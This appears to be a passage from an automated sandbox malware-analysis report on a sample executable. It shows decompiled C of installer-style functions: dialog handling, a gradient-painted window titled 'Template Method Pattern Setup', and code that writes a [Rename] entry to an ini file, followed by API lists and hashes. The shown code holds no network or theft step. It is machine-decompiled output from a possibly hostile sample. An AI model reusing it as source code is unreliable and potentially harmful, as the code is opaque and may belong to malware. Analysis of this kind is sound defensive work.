							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                0x00403cb0
                0x00403cb9
                0x00403dfa
                0x00403dfe
                0x00403e02
                0x00403e04
                0x00403e09
                0x00403e14
                0x00403e1f
                0x00403e24
                0x00403e26
                0x00403e28
                0x00403e2b
                0x00403e30
                0x00403e3e
                0x00403e4b
                0x00403e52
                0x00403e52
                0x00403e53
                0x00403e53
                0x00403e58
                0x00403e5e
                0x00403e65
                0x00403e6b
                0x00403e6d
                0x00403ead
                0x00403eb2
                0x00403eb7
                0x00403eb7
                0x00403ebc
                0x00403ec5
                0x00403ec7
                0x00403ecc
                0x00403ed2
                0x00403ed6
                0x00403ed6
                0x00403edb
                0x00403ee1
                0x00000000
                0x00000000
                0x00403eec
                0x00403ef2
                0x00000000
                0x00000000
                0x00403efb
                0x00403f03
                0x00403f08
                0x00403f0b
                0x00403f11
                0x00403f16
                0x00403f19
                0x00403f1f
                0x00403f24
                0x00403f27
                0x00403f2d
                0x00403f35
                0x00403f3b
                0x00403f41
                0x00403f45
                0x00403f4c
                0x00403f4c
                0x00403f4c
                0x00403f56
                0x00403f68
                0x00403f74
                0x00403f79
                0x00403f83
                0x00403f89
                0x00403f8b
                0x00403f90
                0x00403f8d
                0x00403f8d
                0x00403f8d
                0x00403fa0
                0x00403fb8
                0x00403fba
                0x00403fc0
                0x00403fd5
                0x00403fc2
                0x00403fcb
                0x00403fcd
                0x00403fcd
                0x00403fdb
                0x00403fec
                0x00403ffd
                0x00404004
                0x0040400a
                0x0040400e
                0x00404013
                0x00404015
                0x00000000
                0x0040401b
                0x0040401b
                0x0040401d
                0x00000000
                0x00000000
                0x00404023
                0x00404027
                0x0040404c
                0x00404052
                0x00404058
                0x0040405a
                0x00000000
                0x00000000
                0x00404080
                0x00404086
                0x00404088
                0x0040408d
                0x00000000
                0x00000000
                0x00404093
                0x00404096
                0x00404099
                0x004040b0
                0x004040bc
                0x004040d5
                0x004040db
                0x004040df
                0x004040e4
                0x004040ea
                0x00000000
                0x00000000
                0x004040f4
                0x004040ff
                0x00000000
                0x004040ff
                0x00404029
                0x0040402f
                0x00000000
                0x00000000
                0x00404035
                0x0040403b
                0x00000000
                0x00000000
                0x00000000
                0x00404041
                0x00404015
                0x0040410c
                0x00404118
                0x0040411f
                0x00000000
                0x00403e6f
                0x00403e6f
                0x00403e72
                0x00403ea5
                0x00403ea5
                0x00403ea7
                0x00000000
                0x00000000
                0x00000000
                0x00403ea7
                0x00403e74
                0x00403e78
                0x00403e7d
                0x00403e7f
                0x00000000
                0x00000000
                0x00403e8f
                0x00403e97
                0x00000000
                0x00403e9d
                0x00403ccb
                0x00403ccb
                0x00403ccf
                0x00403cd4
                0x00403ce3
                0x00403ce3
                0x00403cec
                0x00403cf5
                0x00403d00
                0x00403d00
                0x00403d0c
                0x00403d28
                0x00403d2b
                0x00403d3e
                0x00403d44
                0x00403de7
                0x00000000
                0x00403df0
                0x00403d4a
                0x00403d57
                0x00403d59
                0x00403d5b
                0x00403d7a
                0x00403d7a
                0x00403d7d
                0x00403d82
                0x00403d85
                0x00403d95
                0x00403d96
                0x00403d98
                0x00403dce
                0x00403de1
                0x00000000
                0x00403de1
                0x00403d9a
                0x00403da0
                0x00403db9
                0x00403dbe
                0x00403dc0
                0x00000000
                0x00000000
                0x00403dc2
                0x00403dae
                0x00403dae
                0x00403db0
                0x00403db0
                0x00000000
                0x00403db0
                0x00403da3
                0x00403da8
                0x00000000
                0x00403da8
                0x00403d87
                0x00403d8d
                0x00000000
                0x00000000
                0x00403d8f
                0x00000000
                0x00403d8f
                0x00403d7f
                0x00000000
                0x00403d7f
                0x00403d65
                0x00403d6c
                0x00403d72
                0x00403d74
                0x00000000
                0x00000000
                0x00000000
                0x00403d74
                0x00403d30
                0x00000000
                0x00403d0e
                0x00403d14
                0x00403d1e
                0x00404125
                0x0040412b
                0x0040412d
                0x00404133
                0x00404138
                0x0040413e
                0x0040413e
                0x00404133
                0x00404148
                0x00000000
                0x00404148
                0x00403d0c

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                • ShowWindow.USER32(?), ref: 00403D00
                • DestroyWindow.USER32 ref: 00403D14
                • SetWindowLongA.USER32 ref: 00403D30
                • GetDlgItem.USER32 ref: 00403D51
                • SendMessageA.USER32 ref: 00403D65
                • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                • GetDlgItem.USER32 ref: 00403E1A
                • GetDlgItem.USER32 ref: 00403E24
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                • SendMessageA.USER32 ref: 00403E8F
                • GetDlgItem.USER32 ref: 00403F35
                • ShowWindow.USER32(00000000,?), ref: 00403F56
                • EnableWindow.USER32(?,?), ref: 00403F68
                • EnableWindow.USER32(?,?), ref: 00403F83
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                • EnableMenuItem.USER32 ref: 00403FA0
                • SendMessageA.USER32 ref: 00403FB8
                • SendMessageA.USER32 ref: 00403FCB
                • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                • ShowWindow.USER32(?,0000000A), ref: 00404138
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x739685
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}


















                0x004042f6
                0x0040441b
                0x00404477
                0x0040447b
                0x00404548
                0x0040454a
                0x0040454a
                0x00404550
                0x00404550
                0x00404553
                0x00000000
                0x0040455a
                0x00404489
                0x0040448b
                0x00404495
                0x004044a0
                0x004044a3
                0x004044a6
                0x004044b1
                0x004044b4
                0x004044bb
                0x004044c9
                0x004044e1
                0x004044e3
                0x004044eb
                0x004044fa
                0x004044fc
                0x004044fc
                0x004044bb
                0x00404506
                0x00000000
                0x00404511
                0x00404515
                0x00404526
                0x00404526
                0x0040452c
                0x0040453a
                0x0040453a
                0x00000000
                0x0040453e
                0x00404506
                0x00404426
                0x00000000
                0x0040443a
                0x00404440
                0x00404446
                0x00000000
                0x00000000
                0x0040446b
                0x0040446d
                0x00404472
                0x00000000
                0x00404472
                0x00404426
                0x004042fc
                0x004042ff
                0x00404304
                0x00404306
                0x00404315
                0x00404315
                0x0040431c
                0x0040431f
                0x00404321
                0x00404326
                0x0040432f
                0x00404335
                0x00404341
                0x00404344
                0x0040434d
                0x00404352
                0x00404355
                0x0040435a
                0x00404371
                0x00404378
                0x0040438b
                0x0040438e
                0x004043a3
                0x004043aa
                0x004043af
                0x004043b4
                0x004043b4
                0x004043c3
                0x004043d2
                0x004043e4
                0x004043e9
                0x004043f9
                0x004043fb
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: Cgrlcpdlsle$N
                • API String ID: 3103080414-370142420
                • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Template Method Pattern Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,Template Method Pattern Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$Template Method Pattern Setup
                • API String ID: 941294808-3130351657
                • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                0x00405d66
                0x00405d6f
                0x00405d76
                0x00405d8a
                0x00405db2
                0x00405dbd
                0x00405dc1
                0x00405de1
                0x00405de8
                0x00405df2
                0x00405dff
                0x00405e04
                0x00405e09
                0x00405e0d
                0x00405e1c
                0x00405e1e
                0x00405e2b
                0x00405e2f
                0x00405eca
                0x00000000
                0x00405e45
                0x00405e52
                0x00405e76
                0x00405e7a
                0x00405e99
                0x00405e9d
                0x00405e9d
                0x00405e9f
                0x00405ea8
                0x00405eb3
                0x00405ebe
                0x00405ec4
                0x00000000
                0x00405ec4
                0x00405e7c
                0x00405e7f
                0x00405e8a
                0x00405e86
                0x00405e88
                0x00405e89
                0x00405e89
                0x00405e91
                0x00405e93
                0x00000000
                0x00405e93
                0x00405e5d
                0x00405e63
                0x00000000
                0x00405e63
                0x00405e2f
                0x00405e0d
                0x00405d8c
                0x00405d97
                0x00405da0
                0x00405da4
                0x00000000
                0x00000000
                0x00405da4
                0x00405ed5

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                • GetShortPathNameA.KERNEL32 ref: 00405DA0
                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                • GetShortPathNameA.KERNEL32 ref: 00405DBD
                • wsprintfA.USER32 ref: 00405DDB
                • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                • GlobalFree.KERNEL32 ref: 00405EC4
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %s=%s$[Rename]
                • API String ID: 2171350718-1727408572
                • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
